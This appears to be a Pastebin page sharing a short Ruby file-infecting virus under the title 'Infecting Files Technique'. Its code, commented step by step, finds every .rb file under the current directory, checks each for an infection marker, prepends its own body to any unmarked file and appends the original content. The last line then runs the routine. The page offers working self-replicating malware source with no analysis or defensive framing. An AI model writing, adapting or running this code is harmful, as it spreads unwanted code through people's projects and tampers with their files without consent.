Advertisement
FlyFar

Infecting Files Technique (Ruby)

Oct 21st, 2021
244
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Ruby 1.83 KB | None | 0 0
  1. #0x3a
  2. #!/usr/bin/ruby
  3. def infect_files
  4.   count = 0     # This will halt content reading after the virus_bottom tag
  5.   virus_top     = '#0x3a'       # Distinguishing tag telling us if the file is infected or not
  6.   virus_bottom  = '#:'          # Tag at the bottom of the virus to as a marker of what code to infect other programs with
  7.   files = Dir["./**/*.rb"]      # Grab all the ruby files in the directory of the infected file.
  8.  
  9.   files.each do |random_file|   # For each ruby file in the same directory as the infected file
  10.  
  11.     first_line = File.open(random_file, &:gets).strip # Grab the first line (to check the distinguishing tag at the top)
  12.  
  13.     if first_line != virus_top  # If the program is not infected
  14.       File.rename(random_file, 'tmp.rb') # Rename the normal file to tmp.rb
  15.       virus_file = File.open(__FILE__, "rb") # Open infecting file for reading
  16.       virus_contents = '' # Storing virus data until virus_bottom is hit
  17.       # This is necessary to prevent programs from writing their own content when embedding to other programs
  18.       virus_file.each_line do |line| # for every line in the infected file
  19.         virus_contents += line  # Add each line to our virus content
  20.         if line =~ /#{virus_bottom}/
  21.           count += 1
  22.           if count == 2 then break end # Until we hit the virus_bottom tag
  23.         end
  24.       end
  25.       File.open(random_file, 'w') {|f| f.write(virus_contents) } # Write virus content to the old file's name
  26.       good_file = File.open('tmp.rb', 'rb') # Open the tmp.rb file (contains good code) for reading
  27.       good_contents = good_file.read # Grab the contents of the good file
  28.       File.open(random_file, 'a') {|f| f.write(good_contents)} # Append the good content to the random file
  29.       File.delete('tmp.rb') # Delete the temporary file
  30.     end
  31.   end
  32. end
  33.  
  34. infect_files # Run virus
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement